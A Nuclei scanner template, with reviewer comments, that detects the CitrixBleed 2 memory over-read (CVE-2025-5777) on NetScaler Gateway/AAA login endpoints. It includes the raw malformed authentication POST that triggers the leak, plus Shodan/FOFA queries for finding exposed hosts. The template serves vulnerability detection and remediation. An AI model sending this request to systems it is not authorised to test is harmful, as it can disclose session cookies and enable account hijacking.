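# Nuclei HTTP template: checks a NetScaler Gateway / AAA login endpoint for the
# CVE-2025-5777 memory over-read by sending one malformed authentication POST
# and inspecting the value echoed back in the response.
id: CVE-2025-5777

info:
  name: Citrix NetScaler Memory Disclosure - CitrixBleed 2
  author: CyberTechAjju
  severity: critical
  description: |
    Insufficient input validation on the NetScaler Management Interface allows for memory overread, potentially leaking sensitive information including session cookies.
  # Upgrading does not invalidate tokens that were already disclosed, hence
  # the session reset after the upgrade.
  remediation: |
    Upgrade to a fixed build listed in Citrix bulletin CTX693420, then terminate existing ICA and PCoIP sessions so that session tokens disclosed before the upgrade cannot be reused.
  reference:
    # NOTE(review): this path names cve-2025-5755, not 5777 - verify the link.
    - https://github.com/cyberajju/cve-2025-5755
    - https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420
    - https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-5777
  classification:
    cve-id: CVE-2025-5777
    # EPSS values are a point-in-time snapshot; refresh before using them for
    # prioritisation.
    epss-score: 0.00042
    epss-percentile: 0.12361
  metadata:
    verified: true
    max-request: 1
    shodan-query:
      - http.html:"_ctxstxt_NetscalerAAA"
      - title:"NetScaler Gateway"
      - title:"NetScaler AAA"
      - http.favicon.hash:-1166125415
      - http.favicon.hash:-1292923998
    fofa-query:
      - title="NetScaler Gateway"
      - title="NetScaler AAA"
      - icon_hash="-1166125415"
      - icon_hash="-1292923998"
  # NOTE(review): 'citrix2' differs from the usual 'citrix' tag; confirm it is
  # intentional so tag-based runs still select this template.
  tags: cve,cve2025,netscaler,citrix2,exposure

http:
  - raw:
      # Content-Length (5) matches the body "login": the parameter is sent
      # without '=' or a value. 'unsafe: true' sends the request as written.
      - |+
        POST /p/u/doAuthentication.do HTTP/1.0
        Host: {{Hostname}}
        bleed_attack: {{iteration}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Content-Length: 5

        login

    unsafe: true

    # Single payload entry, so exactly one request is sent (max-request: 1).
    payloads:
      iteration:
        - "{{rand_int(1,5)}}"

    extractors:
      # internal: true keeps the extracted bytes out of the scan output, so any
      # disclosed memory is not copied into reports.
      - type: regex
        name: iv
        part: body
        group: 1
        regex:
          # Anchored to the response element that carries the value. The
          # collapsed source had only the bare group, which would match the
          # first run of 10+ characters without '<' anywhere in the body.
          # NOTE(review): element name taken from the referenced write-up -
          # confirm against a known-good response before relying on it.
          - '<InitialValue>([^<]{10,})</InitialValue>'
        internal: true

    stop-at-first-match: true

    matchers:
      # The original list ended with '!contains(to_string(iv), "")'. Every
      # string contains the empty string, so that clause was always false and,
      # under 'condition: and', the template could never report a finding
      # (a silent false negative). It is dropped here; if a specific substring
      # was intended, restore the clause with the real value.
      - type: dsl
        dsl:
          - 'len(iv) > 0'
          - 'contains(to_lower(header), "application/vnd.citrix.authenticateresponse")'
          - '!contains(to_string(iv), "false")'
          - '!contains(to_string(iv), "true")'
        condition: and

# NOTE(review): the digest below signs the exact template text; it no longer
# matches after any edit and must be regenerated by re-signing the template.
# digest: 4a0a0047304502206b67756161e3b05759fd9b89e48fc20df8b936eb68641538bf775f6622acb3cb022100a66c907bf2dc255cf92f5d45b38725b3fb77795d037772f710e8f78ed0c503bd:922c64590222798bb761d5b6d8e72950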